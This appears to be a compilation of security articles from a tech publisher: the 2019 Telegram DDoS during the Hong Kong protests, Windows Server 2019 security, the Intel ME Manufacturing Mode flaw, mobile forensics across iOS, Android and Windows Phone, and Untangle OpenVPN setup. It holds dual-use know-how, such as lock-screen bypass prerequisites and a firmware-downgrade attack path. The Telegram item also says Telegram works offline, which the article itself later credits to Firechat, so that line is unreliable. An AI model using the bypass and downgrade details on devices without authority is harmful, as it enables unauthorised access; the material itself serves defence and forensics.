Telegram faces massive DDoS attack; suspects link to the ongoing Hong Kong protests

Savia Lobo
14 Jun 2019
4 min read
Telegram's founder Pavel Durov shared his suspicion that the recent massive DDoS attack on his messaging service was carried out by the Chinese government. He also stated that the attack coincides with the ongoing Hong Kong protests, where protesters have used Telegram for communication to avoid detection, as it can function both online and offline.

https://twitter.com/durov/status/1138942773430804480

On June 12, a tweet from Telegram Messenger informed users that the messaging service was "experiencing a powerful DDoS attack". It further said that this attack was flooding its servers with "garbage requests", thus disrupting legitimate communications. Telegram allows people to send encrypted messages, documents, videos, and pictures free of charge. Users can create groups for up to 200,000 people or channels for broadcasting to unlimited audiences. The reason for its growing popularity is its emphasis on encryption, which prevents many widely used methods of reading confidential communications.

Hong Kong protests: a movement opposing the 'extradition law'

On Sunday, around 1 million people demonstrated in the semi-autonomous Chinese city-state against amendments to an extradition law that would allow a person arrested in Hong Kong to face trial elsewhere, including in mainland China. "Critics fear the law could be used to cement Beijing's authority over the semi-autonomous city-state, where citizens tend to have a higher level of civil liberties than in mainland China", The Verge reports. According to The New York Times, "Hong Kong, a semi-autonomous Chinese territory, enjoys greater freedoms than mainland China under a 'one country, two systems' framework put in place when the former British colony was returned to China in 1997. Hong Kong residents can freely surf the Internet and participate in public protests, unlike in the mainland."

To avoid surveillance and potential future prosecutions, the protesters disabled location tracking on their phones, bought train tickets using cash, and refrained from having conversations on social media. Many protesters masked their faces to avoid facial recognition and avoided using public transit cards, fearing they could be linked to their identities, instead opting for paper tickets. According to France24, "Many of those on the streets are predominantly young and have grown up in a digital world, but they are all too aware of the dangers of surveillance and leaving online footprints." Ben, a masked office worker at the protests, said he feared the extradition law would have a devastating impact on freedoms. "Even if we're not doing anything drastic -- as simple as saying something online about China -- because of such surveillance they might catch us," the 25-year-old told France24.

The South China Morning Post first reported on the role the messaging app played in the protests when a Telegram group administrator was arrested for conspiracy to commit public nuisance. The allegation against the man, who managed a conversation involving 30,000 members, is that he plotted with others to charge the Legislative Council Complex and block neighbouring roads, SCMP reports. Bloomberg reported that protesters "relied on encrypted services to avoid detection. Telegram and Firechat -- a peer-to-peer messaging service that works with or without internet access -- are among the top trending apps in Hong Kong's Apple store".
"Hong Kong's Legislative Council suspended a review of the bill for a second day on Thursday amid the continued threat of protests. The city's leader, Chief Executive Carrie Lam, is seeking to pass the legislation by the end of the current legislative session in July", Bloomberg reports.

Telegram also noted that the DDoS attack appears to have stabilized and assured users that their data is safe.

https://twitter.com/telegram/status/1138781915560009735
https://twitter.com/telegram/status/1138777137102675969

Telegram explained the DDoS attack in an interesting way: A DDoS is a "Distributed Denial of Service attack": your servers get GADZILLIONS of garbage requests which stop them from processing legitimate requests. Imagine that an army of lemmings just jumped the queue at McDonald's in front of you, and each is ordering a whopper. The server is busy telling the whopper lemmings they came to the wrong place, but there are so many of them that the server can't even see you to try and take your order.

NSA warns users of BlueKeep vulnerability; urges them to update their Windows systems
Over 19 years of ANU (Australian National University) students' and staff data breached
All Docker versions are now vulnerable to a symlink race attack


Dean Wells on what’s new in Windows Server 2019 Security

Savia Lobo
17 Dec 2019
9 min read
Windows Server 2019 has brought many enhancements to its security posture as well as a whole new set of capabilities. In a session titled 'Elevating your security posture with Windows Server 2019' at Microsoft Ignite 2018, Dean Wells, a program manager on the Windows Server team, provided a rich overview of many of the security capabilities that are built into Windows Server, with a specific focus on what's new in Windows Server 2019.

Want to develop the necessary skills to design and implement Microsoft Server 2019? If you are also seeking to support your medium or large enterprise by leveraging your experience in administering Microsoft Server 2019, we recommend you check out our book 'Mastering Windows Server 2019 - Second Edition' written by Jordan Krause.

Wells started off by explaining the SGX platform in order to introduce SGX enclaves and their importance. SGX is a platform technology by Intel that provides a trusted execution environment on a machine that could be littered with malware, and yet the trusted execution environment is able to defend itself from inspection, rights modification, and so on. Microsoft has built a similar technology to SGX, though not as strong as an SGX enclave, called the VBS (virtualization-based security) enclave.

Wells says security threats are one of the key IT stress points. These threats bifurcate into three areas:

Managing privileged identities
Securing the OS
Securing fabric virtualization (VMs) and virtualization-based security

Wells presented 18-month-old data highlighting that over three trillion dollars are impacted annually by cyber attacks, and the figure is growing all the time. He also presented an attack timeline showing how long it takes to discover an attack: from the first entry point, it takes an average of 24 to 48 hours for an attacker to go from entry to domain admin, and attackers dwell inside the network for around 146 days, which is alarming. The common factor in all these attacks is that attackers first seek to exploit privileged accounts. However, one cannot simply do away with administrative power to avoid attacks.

How to secure privileged identities, the OS, and fabric VMs in Windows Server 2019

Wells highlighted certain initiatives to address threats with Windows Server and/or Windows 10.

Managing privileged identities

Just-In-Time: Wells said that people should make sure they have privileged access workstations. This is another industry initiative that advises using workstations that are health-attested; if they are not healthy, they cannot be used to administer the assigned workload.

AAD banned password list: This is written by the Azure Active Directory team. It takes the AI and clever matching techniques that Azure AD uses in the cloud and brings them to Windows Server AD.

There are many identity protections on the platform, but not everything is for everyone. One has to make a proactive effort to turn these features on.

Securing the OS

This is the area where one invests the most. In the past, code integrity was enforced by the kernel itself; with the hypervisor in place, the OS cannot directly communicate with the hardware. This is where one can lay down new policies, such as a code integrity policy. The hypervisor can block things that a malicious kernel is trying to insert into the hardware. One can also secure the OS using Control Flow Guard, Defender ATP, and the System Guard runtime monitor.
Securing fabric virtualization (VMs) and virtualization-based security

This includes Shielded VMs, which are resistant to malware and to host admin attacks on the very Hyper-V host where they are running. Users can also secure virtualization using Hyper-V containers, micro-segmentation, 802.1x support in switches, and so on. To know more about each section in detail, head over to the video 'Elevating your security posture with Windows Server 2019'.

What's new in Windows Server 2019

Microsoft has made extensive use of Virtualization-Based Security (VBS) in Windows Server 2019, as this lays the foundation for protecting OS and workload secrets. The other features include:

Shielded VM improvements, including branch office support, simple cloud-friendly attestation, Linux OSes, and advanced troubleshooting.
Device Guard policy updates that can now be applied without a reboot; new default policies ship in-box, and two or more policies can be stacked to create a combined effective policy.
Kernel Control Flow Guard (CFG), which ensures that user and kernel-mode binaries run as expected.
System Guard Runtime Monitor, which runs inside the VBS enclave, keeps an eye on everything else, and emits health assertions.
Virtual network encryption through SDN, which provides transparent encryption for the VMs.
Windows Defender ATP, which is now in-box, so no additional download is required.

Trusted Private Cloud for Windows

Mike Bartok from NIST (the National Institute of Standards and Technology) talked about the trusted cloud and how NIST is trying to build on the capabilities mentioned by Dean. Bartok presented a NIST Special Publication 1800-series document that consists of three volumes:

Volume A: A high-level executive summary that can be taken to the C-suite to discuss cloud adoption and how to do it in a trusted manner. It also includes a high-level overview of the project, the challenges, solutions, benefits, and so on.
Volume B: A deeper dive into the challenges and solutions. It also includes a reference architecture of the various solutions to the problems and a mapping to the security controls in the NIST Cybersecurity Framework and the 800-53 family.
Volume C: A technical how-to guide that shows every step implemented to reach the solution via screenshots, or includes pointers back to Microsoft's installation guides. One can pick up the guide and replicate the project.

Security objectives in Trusted Cloud

The security outcomes of Trusted Cloud are categorized into those that are foundational and those in progress. Foundational security outcomes include hardware root-of-trust and geolocation-based asset tagging, and deploying and migrating workloads to trusted platforms with specific tags. The outcomes in progress include:

Ensure workloads are decrypted on a server that meets the trust and boundary policies.
Ensure workloads meet the least-privilege principle for network flow.
Ensure industry-sector-specific compliance.
Deploy and migrate workloads to trusted platforms across hybrid environments.

Each of these outcomes is supported by different partners, including Intel, Dell EMC, Microsoft, Docker, and Twistlock.

Virtualization infrastructure security

Multiple users have their hosts in the virtualization fabric, and a host may appear healthy simply because it is running fine. In a guarded fabric, however, there is no way a host can run protected workloads without being provided with a key; that is how it is designed. Dean explains that the solution to this security concern is a guarded fabric running Shielded VMs.
A few security assurance goals for these Shielded VMs include:

Encryption of data both at rest and in flight: The virtual TPM enables the use of disk encryption within a VM (for example, BitLocker). Both live migration traffic and the VM state are encrypted.
Fabric admins locked out: Host administrators cannot access guest VM secrets (for example, they can't see disks, video, and so on). They also cannot run arbitrary kernel-mode code.
Malware blocked, attestation of host required: VM workloads can only run on healthy hosts designated by the VM owner. However, shielding is not intended as a defense against DoS attacks.

Shielded VMs in Windows Server 2019

The Shielded VM is a unique security feature introduced by Microsoft in Windows Server 2016. In the latest Windows Server 2019 edition, it has undergone a lot of enhancements.

Linux guest OS support

The Linux guest OS support in Windows Server 2019 covers Ubuntu, Red Hat Enterprise Linux (RHEL), and SUSE Linux Enterprise Server inside shielded VMs. Here, the host should run Windows Server 2019. These shielded VMs will also fully support secure provisioning to ensure the template disk is safe and trusted.

Host Key Attestation

With this Shielded VM enhancement, hosts use asymmetric key pairs to authorize themselves to run shielded VMs. This works similarly to how SSH works: no more AD trusts and no certificates are required. It allows an easier onboarding process with fewer requirements and less fragility, which helps get a guarded fabric up and running quickly. Host Key Attestation has assurances similar to Active Directory attestation; that is, it checks only the host's identity and not its health. Best practice still recommends the use of TPM attestation for the most secure workloads.
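To illustrate the SSH-like host key idea in general terms (a conceptual sketch only; this is not how HGS is implemented internally), the host holds a private key, the attestation service registers the public half, and authorization reduces to a signature check over a fresh challenge. The sketch below uses Python with the third-party cryptography package.

```python
import os
from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PrivateKey

# Host side: generate a key pair. The public half is registered with the
# attestation service out of band, like adding a key to a known-hosts list.
host_private = Ed25519PrivateKey.generate()
registered_public = host_private.public_key()

# Attestation service side: challenge the host with a random nonce.
nonce = os.urandom(32)

# Host side: prove possession of the private key by signing the nonce.
signature = host_private.sign(nonce)

# Attestation service side: verify against the registered public key
# before releasing VM keys; verify() raises InvalidSignature on failure.
try:
    registered_public.verify(signature, nonce)
    print("Host authorized: release shielded VM keys")
except InvalidSignature:
    print("Unknown host: refuse to release keys")
```

The trade-off the session describes follows from this model: a key pair proves who the host is, but unlike TPM attestation it says nothing about whether the host is in a healthy, unmodified state.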

“Intel ME has a Manufacturing Mode vulnerability, and even giant manufacturers like Apple are not immune,” say researchers

Savia Lobo
03 Oct 2018
4 min read
Yesterday, a group of European information security researchers announced that they have discovered a vulnerability related to Intel's Management Engine (Intel ME). They say that the root of this problem is an undocumented Intel ME mode, known as Manufacturing Mode. Undocumented commands enable overwriting the SPI flash memory, opening the door to a worst-case scenario: local exploitation of an ME vulnerability (INTEL-SA-00086).

What is Manufacturing Mode?

Intel ME Manufacturing Mode is intended for the configuration and testing of the end platform during manufacturing. However, this mode and its potential risks are not described anywhere in Intel's public documentation. Ordinary users do not have the ability to disable this mode, since the relevant utility (part of Intel ME System Tools) is not officially available. As a result, there is no software that can protect, or even notify, the user if this mode is enabled. This mode allows configuring critical platform settings stored in one-time-programmable memory (FUSEs). These settings include those for BootGuard (the mode, policy, and hash for the digital signing key for the ACM and UEFI modules). Some of them are referred to as FPFs (Field Programmable Fuses).

An output of the -FPFs option in FPT

In addition to FPFs, in Manufacturing Mode the hardware manufacturer can specify settings for Intel ME, which are stored in the Intel ME internal file system (MFS) on SPI flash memory. These parameters can be changed by reprogramming the SPI flash. The parameters are known as CVARs (Configurable NVARs, Named Variables). CVARs, just like FPFs, can be set and read via FPT.

Manufacturing Mode vulnerability in Intel chips within Apple laptops

The researchers analyzed several platforms from a number of manufacturers, including Lenovo and Apple MacBook Pro laptops. The Lenovo models did not have any issues related to Manufacturing Mode. However, the researchers found that the Intel chipsets within the Apple laptops were running in Manufacturing Mode and were affected by the vulnerability CVE-2018-4251. This information was reported to Apple, and the vulnerability was patched in June, in the macOS High Sierra update 10.13.5. By exploiting CVE-2018-4251, an attacker could write old versions of Intel ME (such as versions containing the INTEL-SA-00086 vulnerability) to memory without needing an SPI programmer and without physical access to the computer. Thus, a local vector is possible for the exploitation of INTEL-SA-00086, which enables running arbitrary code in ME. The researchers also stated that, in the notes for the INTEL-SA-00086 security bulletin, Intel does not mention enabled Manufacturing Mode as a vector for local exploitation in the absence of physical access. Instead, the company incorrectly claims that local exploitation is possible only if access settings for SPI regions have been misconfigured.

How can users save themselves from this vulnerability?

To keep users safe, the researchers decided to describe how to check the status of Manufacturing Mode and how to disable it. Intel ME System Tools includes the MEInfo utility for obtaining thorough diagnostic information about the current state of ME and the platform overall. The researchers demonstrated this utility in their previous research about the undocumented HAP (High Assurance Platform) mode, where they showed how to disable ME. The utility, when called with the -FWSTS flag, displays a detailed description of the HECI status registers and the current status of Manufacturing Mode (when the fourth bit of the FWSTS status register is set, Manufacturing Mode is active).

Example of MEInfo output

They also created a program (mmdetect) for checking the status of Manufacturing Mode if the user, for whatever reason, does not have access to Intel ME System Tools. Here is what the script shows on affected systems:

mmdetect script
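As a rough illustration of the check just described, here is a minimal Python sketch that interprets an already-obtained FWSTS1 value. How you read that register is platform-specific (for example, from MEInfo output or from the MEI PCI device's configuration space), and the bit position is taken from the researchers' description above, so treat both as assumptions rather than a definitive implementation:

# Minimal sketch: interpret an FWSTS1 register value obtained elsewhere.
# Assumption: the "fourth bit" described above is bit 4 (counting from zero).
MANUFACTURING_MODE_BIT = 1 << 4

def manufacturing_mode_enabled(fwsts1):
    """Return True if the Manufacturing Mode bit is set in FWSTS1."""
    return bool(fwsts1 & MANUFACTURING_MODE_BIT)

if __name__ == "__main__":
    # Example value for demonstration only; a real check must read the
    # register from the MEI device on the platform being examined.
    print(manufacturing_mode_enabled(0x94000255))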
To disable Manufacturing Mode, FPT has a special option (-CLOSEMNF) that sets the recommended access rights for the SPI flash regions in the descriptor. Here is what happens when -CLOSEMNF is entered:

Process of closing Manufacturing Mode with FPT

Thus, the researchers demonstrated that Intel ME has a Manufacturing Mode problem. Even major commercial manufacturers such as Apple are not immune to configuration mistakes on Intel platforms. Also, there is no public information on the topic, leaving end users in the dark about weaknesses that could result in data theft, persistent irremovable rootkits, and even 'bricking' of hardware. To know about this vulnerability in detail, visit Positive Research's blog.

Mobile Forensics

Packt
24 May 2016
15 min read
In this article by Soufiane Tahiri, the author of Mastering Mobile Forensics, we will look at the basics of smartphone forensics. Smartphone forensics is a relatively new and quickly emerging field of interest within the digital forensic community and law enforcement, as today's mobile devices are getting smarter, cheaper, and more easily available for common daily use.

(For more resources related to this topic, see here.)

To investigate the growing number of digital crimes and complaints, researchers have put a lot of effort into designing the most appropriate investigative models; in this article, we will emphasize the importance of paying real attention to the growing smartphone market, and to the efforts made in this field from a digital forensic point of view, in order to design the most comprehensive investigation process.

Smartphone forensics models

Given the pace at which mobile technology grows and the variety of complexities produced by today's mobile data, forensic examiners face serious adaptation problems, so developing and adopting standards makes sense. The reliability of evidence depends directly on the investigative processes adopted; skipping a step, deliberately or accidentally, may (and almost certainly will) lead to incomplete evidence and increase the risk of rejection in a court of law. Today, there is no standard or unified model adapted to acquiring evidence from smartphones. The dramatic development of smart devices suggests that any forensic examiner will have to apply as many independent models as necessary in order to collect and preserve data. As with any forensic investigation, several approaches and techniques can be used to acquire, examine, and analyze data from a mobile device. This section proposes a process that summarizes guidelines from different standards and models (SWGDE Best Practices for Mobile Phone Forensics, NIST Guidelines on Mobile Device Forensics, and Developing Process for Mobile Device Forensics by Det. Cynthia A. Murphy). The following flowchart schematizes the overall process:

Evidence intake: This triggers the examination process. This step should be documented.
Identification: The examiner needs to identify the device's capabilities and specifications, and should document everything that takes place during the identification process.
Preparation: The examiner should prepare the tools and methods to use, and must document them.
Securing and preserving evidence: The examiner should protect the evidence and secure the scene, as well as isolate the device from all networks. The examiner needs to be vigilant when documenting the scene.
Processing: At this stage, the examiner performs the actual (and technical) data acquisition and analysis, and documents the steps taken, the tools used, and all findings.
Verification and validation: The examiner should be sure of the integrity of the findings, and must validate the acquired data and evidence. This step should be documented as well.
Reporting: The examiner produces a final report documenting the process and findings.
Presentation: This stage is meant to exhibit and present the findings.
Archiving: At the end of the forensic process, the examiner should preserve the data, report, tools, and all findings in common formats for eventual later use.

Low-level techniques

Digital forensic examiners can neither always nor exclusively rely on commercially available tools; handling low-level techniques is a must.
This section also covers the techniques of extracting strings from different objects (for example, smartphone memory images). Any digital examiner should be familiar with concepts and techniques such as the following (a short file-carving sketch follows this list):

File carving: This is defined as the process of extracting a collection of data from a larger data set, as applied to a digital investigation. File carving is the process of extracting data from unallocated filesystem space using the inner structure of file types rather than the filesystem structure, meaning that the extraction process is principally based on file type headers and trailers.

Extracting metadata: Loosely put, metadata is data that describes data, or information about information. In general, metadata is hidden, extra information generated and embedded automatically in a digital file. The definition of metadata differs depending on the context in which it's used and the community that refers to it; metadata can be considered machine-understandable information, or a record that describes digital records. Metadata can be subdivided into three important types: descriptive (including elements such as author, title, abstract, keywords, and so on), structural (describing how an object is constituted and how its elements are arranged), and administrative (including elements such as the date and time of creation, the data type, and other technical details).

String dump and analysis: Most digital investigations rely on textual evidence. This is obviously due to the fact that most stored digital data is linguistic, for instance, logged conversations. A lot of important text-based evidence can be gathered by dumping strings from images (smartphone memory dumps), including e-mails, instant messaging, address books, browsing history, and so on. Most of the currently available digital forensic tools rely on matching and indexing algorithms to search textual evidence at the physical level, so that they search every byte to locate specific text strings.

Encryption versus encoding versus hashing: The important thing to keep in mind is that encoding, encrypting, and hashing do not mean the same thing at all:
Encoding: This is meant for data usability; it can be reversed using the same algorithm and requires no key.
Encrypting: This is meant for confidentiality; it is reversible and, depending on the algorithm, relies on key(s) to encrypt and decrypt.
Hashing: This is meant for data integrity; it cannot (theoretically) be reversed and depends on no keys.

Decompiling and disassembling: These are types of reverse engineering processes that do the opposite of what a compiler and an assembler do:
Decompiler: This translates a compiled binary's low-level code, designed to be computer readable, into human-readable high-level code. The accuracy of decompilers depends on many factors, such as the amount of metadata present in the code being decompiled and the complexity of the code (not in terms of algorithms, but in terms of the sophistication of the high-level code used).
Disassembler: The output of a disassembler is at some level dependent on the processor; it maps processor instructions into mnemonics. In contrast to a decompiler's output, disassembly is far more complicated to understand and edit.
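To make the file-carving idea concrete, here is a minimal Python sketch that scans a raw memory image for JPEG files using their header (FF D8 FF) and trailer (FF D9) signatures. It is a simplified illustration under that single-file-type assumption, not a production carver; real tools handle fragmentation, false positives, and many more file types:

import sys

JPEG_HEADER = b"\xff\xd8\xff"   # JPEG start-of-image marker
JPEG_TRAILER = b"\xff\xd9"      # JPEG end-of-image marker

def carve_jpegs(image_path):
    """Naively carve JPEGs from a raw dump by header/trailer matching."""
    data = open(image_path, "rb").read()
    count = 0
    start = data.find(JPEG_HEADER)
    while start != -1:
        end = data.find(JPEG_TRAILER, start)
        if end == -1:
            break  # header without a trailer: stop carving
        out_name = "carved_%03d.jpg" % count
        with open(out_name, "wb") as out:
            out.write(data[start:end + len(JPEG_TRAILER)])
        count += 1
        start = data.find(JPEG_HEADER, end)
    return count

if __name__ == "__main__":
    print("Carved %d file(s)" % carve_jpegs(sys.argv[1]))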
iDevices forensics

Similar to all Apple operating systems, iOS is derived from Mac OS X; thus, iOS uses Hierarchical File System Plus (HFS+) as its primary file system. HFS+ replaced the originally developed filesystem, HFS, and is considered an enhanced version of HFS, though the two are still architecturally very similar. The main improvements seen in HFS+ are:

A decrease in disk space usage on large volumes (efficient use of disk space)
Internationally friendly file names (through the use of Unicode instead of MacRoman)
Allowing future systems to use and extend file/folder metadata

HFS+ divides the total space on a volume (a file that contains data and the structure to access this data) into allocation blocks and uses 32-bit fields to identify them. This allows up to 2^32 blocks on a given volume, which simply means that a volume can hold more files. All HFS+ volumes respect a well-defined structure, and each volume contains a volume header, a catalog file, an extents overflow file, an attributes file, an allocation file, and a startup file.

In addition, all Apple iDevices combine built-in hardware and software security, which can be categorized, according to Apple's official iOS Security Guide, as follows:

System security: An integrated software and hardware platform
Encryption and data protection: Mechanisms implemented to protect data from unauthorized use
Application security: Application sandboxing
Network security: Secure data transmission
Apple Pay: Implementation of secure payments
Internet services: Apple's network of messaging, synchronization, and backup
Device controls: Remotely wiping the device if it is lost or stolen
Privacy controls: The ability to control access to geolocation and user data

When dealing with seizure, it's important to turn on Airplane mode and, if the device is unlocked, to set auto-lock to never and check whether a passcode was set or not (Settings | Passcode). If you are dealing with a passcode, try to keep the phone charged if you cannot acquire its content immediately; if no passcode was set, turn off the device. There are four different acquisition methods when talking about iDevices:

Normal or direct acquisition: This is the ideal case, where you can deal directly with a powered-on device.
Logical acquisition: Acquisition is done using an iTunes backup or a forensic tool that uses the AFC protocol; it is in general not complete, as e-mails, the geolocation database, the apps cache folder, and executables are missed.
Advanced logical acquisition: A technique introduced by Jonathan Zdziarski (http://www.zdziarski.com/blog/), but no longer possible due to the introduction of iOS 8.
Physical acquisition: This generates a forensic bit-by-bit image of both the system and data partitions.

Before selecting one method (or not, because the method to choose depends on some parameters), the examiner should answer three important questions: What is the device model? What is the iOS version installed? Is the device passcode protected, and if so, is it a simple or a complex passcode?

Android forensics

Android is an open source, Linux-based operating system. It was first developed by Android Inc. in 2003; it was then acquired by Google in 2005 and unveiled in 2007. The Android operating system, like most operating systems, consists of a stack of software components, roughly divided into four main layers and five main sections (as shown in the image at https://upload.wikimedia.org/wikipedia/commons/a/af/Android-System-Architecture.svg), with each layer providing different services to the layer above.
Understanding every smartphone OS's security model is a big deal in a forensic context. All vendors and smartphone manufacturers care about securing their users' data, and in most cases the security model implemented can cause a real headache for every forensic examiner; Android is no exception to the rule. Android, as you know, is an open source OS built on the Linux kernel, providing an environment that offers the ability to run multiple applications simultaneously. Each application is digitally signed and isolated in its very own sandbox, and each application sandbox defines the application's privileges. Above the kernel, all activities have constrained access to the system. Android OS implements many security components and has many considerations for its various layers; the following figure summarizes the Android security architecture on ARM with TrustZone support:

Without any doubt, lock screens represent the very first starting point in every mobile forensic examination. As with all smartphone OSes, Android offers a way to control access to a given device by requiring user authentication. The problem with recent lock screen implementations in modern operating systems in general, and in Android in particular since it is the point of interest of this section, is that beyond controlling access to the system user interface and applications, lock screens have been extended with more "fancy" features (showing widgets, switching users on multi-user devices, and so on) and with more forensically challenging features, such as unlocking the system keystore to derive the key-encryption key (used, among other things, for the disk encryption key) as well as the credential storage encryption key.

The problem with bypassing lock screens (also called keyguards) is that the usable techniques are very version- and device-dependent; thus, there is neither a generalized method nor an always-working technique. The Android keyguard is basically an Android application whose window lives on a high window layer with the ability to intercept navigation buttons, in order to produce the lock effect. Each unlock method (PIN, password, pattern, and face unlock) is a view component implementation hosted by the KeyguardHostView view container class. All of the methods/modes used to secure an Android device are activated by setting the currently selected mode in the SecurityMode enumeration of the KeyguardSecurityModel class. The following is the KeyguardSecurityModel.SecurityMode implementation, as seen in the Android Open Source Project:

    enum SecurityMode {
        Invalid, // NULL state
        None, // No security enabled
        Pattern, // Unlock by drawing a pattern.
        Password, // Unlock by entering an alphanumeric password
        PIN, // Strictly numeric password
        Biometric, // Unlock with a biometric key (e.g. finger print or face unlock)
        Account, // Unlock by entering an account's login and password.
        SimPin, // Unlock by entering a sim pin.
        SimPuk // Unlock by entering a sim puk
    }

Before starting our bypass and lock-cracking techniques, note that dealing with system files or "system-protected" files assumes that the device you are handling meets some requirements, depending on the technique:

Using Android Debug Bridge (ADB)
The device must be rooted
USB debugging should be enabled on the device
Booting into a custom recovery mode
JTAG/chip-off to acquire a physical bit-by-bit copy

Windows Phone forensics

Based on the Windows NT kernel, Windows Phone 8.x uses the Core System to boot, manage hardware, authenticate, and communicate on networks. The Core System is a minimal Windows system that contains low-level security features, supplemented by a set of Windows Phone specific binaries from the Mobile Core to handle phone-specific tasks; this makes it the only architectural entity in Windows Phone that is distinct from desktop-based Windows. Windows and Windows Phone are completely aligned at the Windows Core System level and run exactly the same code there. The shared core actually consists of the Windows Core System and the Mobile Core, where the APIs are the same but the code behind them is tuned to mobile needs.

Similar to most mobile operating systems, Windows Phone has a layered architecture. The kernel and OS layers are mainly provided and supported by Microsoft, but some layers are provided by Microsoft's partners, depending on the hardware: a board support package (BSP), which usually consists of a set of drivers and support libraries that handle low-level hardware interaction and the boot process, is created by the CPU supplier; the original equipment manufacturers (OEMs) and independent hardware vendors (IHVs) then write the drivers required to support the phone hardware and specific components. The following is a high-level diagram describing the Windows Phone architecture, organized by layer and ownership:

There are three main partitions on a Windows Phone that are forensically interesting: the MainOS, Data, and Removable User Data partitions (the latter is not visible on the preceding screenshot, since the Lumia 920 does not support SD cards). As their respective names suggest, the MainOS partition contains all the Windows Phone operating system components, and the Data partition stores all the user's data, third-party applications, and all application states. The Removable User Data partition is considered by Windows Phone to be a separate volume and refers to all data stored on the SD card (on devices that support SD cards). Each of the previously named partitions respects a folder layout and can be mapped to its root folders with predefined Access Control Lists (ACLs). Each ACL is a list of access control entries (ACEs), and each ACE identifies the user account to which it applies (the trustee) and specifies the access rights allowed, denied, or audited for that trustee.

Windows Phone 8.1 is extremely challenging, and different forensic tools and techniques should be used in order to gather evidence. One of the interesting techniques is side loading an agent to extract contacts and appointments from a WP 8.1 device. To extract phonebook and appointment entries, we will use WP Logical, a contacts and appointments acquisition tool designed to run under Windows Phone 8.1. Once deployed and executed, it creates a folder with the name WPLogical_MDY__HMMSS_PM/AM under the public folder PhonePictures, where M=month, D=day, Y=year, H=hour, MM=minutes, and SS=seconds of the extraction date.
Inside the created folder, you can find appointments__MDY__HMMSS_PM/AM.html and contacts_MDY__HMMSS_PM/AM.html. WP Logical will extract the following information (if found) regarding each appointment, starting from 01/01/CurrentYear at 00:00:00 to 31/12/CurrentYear at 00:00:00:

Subject
Location
Organizer
Invitees
Start time (UTC)
Original start time
Duration (in hours)
Sensitivity
Replay time
Is organized by user?
Is canceled?
More details

And the following information about each found contact:

Display name
First name
Middle name
Last name
Phones (types: personal, office, home, and numbers)
Important dates
Emails (types: personal, office, home, and numbers)
Websites
Job info
Addresses
Notes
Thumbnail

WP Logical also allows the extraction of some device-related information, such as the phone time zone, the device's friendly name, the Stock Keeping Unit (SKU), and so on. Windows Phone 8.1 is relatively strict regarding application deployment; WP Logical can be deployed in two ways:

Upload the compiled agent to the Windows Store and get it signed by Microsoft; after that, it will be available in the store for download.
Deploy the agent directly to a developer-unlocked device using the Windows Phone Application Deployment utility.

Summary

In this article, we looked at forensics for iOS, Android, and Windows Phone devices. We also looked at some low-level forensic techniques.

Resources for Article:

Further resources on this subject:

Mobile Forensics and Its Challanges [article]
Introduction to Mobile Forensics [article]
Forensics Recovery [article]

Untangle VPN Services

Packt
30 Oct 2014
18 min read
This article by Abd El-Monem A. El-Bawab, the author of Untangle Network Security, covers the Untangle VPN solution, OpenVPN. OpenVPN is an SSL/TLS-based VPN that is mainly used for remote access, as it is easy to configure and uses clients that can work on multiple operating systems and devices. OpenVPN can also provide site-to-site connections (only between two Untangle servers) with limited features.

(For more resources related to this topic, see here.)

OpenVPN

Untangle's OpenVPN is an SSL-based VPN solution based on the well-known open source application, OpenVPN. Untangle's OpenVPN is mainly used for client-to-site connections, with a client that is easy to deploy and configure and is widely available for Windows, Mac, Linux, and smartphones. Untangle's OpenVPN can also be used for site-to-site connections, but the two sites need to have Untangle servers. Site-to-site connections between Untangle and third-party devices are not supported.

How OpenVPN works

In reference to the OSI model, an SSL/TLS-based VPN only encrypts the application layer's data, while the lower layers' information is transferred unencrypted. In other words, the application packets are encrypted. The IP addresses of the server and client are visible, and the port number that the server uses for communication between the client and server is also visible, but the actual application port number is not. Furthermore, the final destination IP address of the tunneled traffic is not visible; only the VPN server's IP address is seen. Secure Sockets Layer (SSL) and Transport Layer Security (TLS) refer to essentially the same technology; SSL is the predecessor of TLS. SSL was originally developed by Netscape, and several releases were produced (V.1 to V.3) until it was standardized under the TLS name. The steps to create an SSL-based VPN session are as follows:

1. The client sends a message to the VPN server stating that it wants to initiate an SSL session. It also sends a list of all the ciphers (hash and encryption protocols) that it supports.
2. The server responds with a set of selected ciphers and sends its digital certificate to the client. The server's digital certificate includes the server's public key.
3. The client tries to verify the server's digital certificate by checking it against trusted certificate authorities and by checking the certificate's validity (the valid-from and valid-through dates).
4. The server may need to authenticate the client before allowing it to connect to the internal network. This can be achieved either by asking for a valid username and password or by using the user's digital identity certificate. Untangle NGFW uses the digital certificates method.
5. The client creates a session key (which will be used to encrypt the data transferred between the two devices) and sends this key to the server, encrypted with the server's public key. Thus, no third party can obtain the session key, as the server is the only device that can decrypt it, being the only party that holds the private key.
6. The server acknowledges to the client that it has received the session key and is ready for encrypted data transfer.
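To see the cipher negotiation and certificate verification of this handshake in practice, here is a small, hedged Python sketch using the standard library's ssl module. It simply performs a TLS handshake with a server, verifies its certificate against the system's trusted CAs, and prints the negotiated parameters; the host name is just an example:

import socket
import ssl

def inspect_tls_handshake(host, port=443):
    """Perform a TLS handshake and report the negotiated parameters."""
    context = ssl.create_default_context()  # verifies cert against trusted CAs
    with socket.create_connection((host, port)) as sock:
        with context.wrap_socket(sock, server_hostname=host) as tls:
            print("Protocol version:", tls.version())
            print("Negotiated cipher:", tls.cipher())
            cert = tls.getpeercert()
            print("Certificate valid until:", cert["notAfter"])

if __name__ == "__main__":
    inspect_tls_handshake("www.example.com")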
Configuring Untangle's OpenVPN server settings

After installing the OpenVPN application, it will be turned off; you'll need to turn it on before you can use it. You can configure Untangle's OpenVPN server settings under OpenVPN Settings | Server. These settings define how OpenVPN acts as a server for remote clients (which can be clients on Windows, Linux, or any other operating system, or another Untangle server). The available settings are as follows:

Site Name: This is the name of the OpenVPN site, used to identify the server among other OpenVPN servers inside your organization. This name should be unique across all Untangle servers in the organization. A random name is automatically chosen for the site name.
Site URL: This is the URL that the remote client will use to reach this OpenVPN server. It can be configured under Config | Administration | Public Address. If you have more than one WAN interface, the remote client will first try to initiate the connection using the settings defined in the public address. If this fails, it will randomly try the IPs of the remaining WAN interfaces.
Server Enabled: If checked, the OpenVPN server will run and accept connections from remote clients.
Address Space: This defines the IP subnet that will be used to assign IPs to the remote VPN clients. The value in Address Space must be unique and separate from all existing networks and other OpenVPN address spaces. A default address space is chosen that does not conflict with the existing configuration:

Configuring Untangle's OpenVPN remote client settings

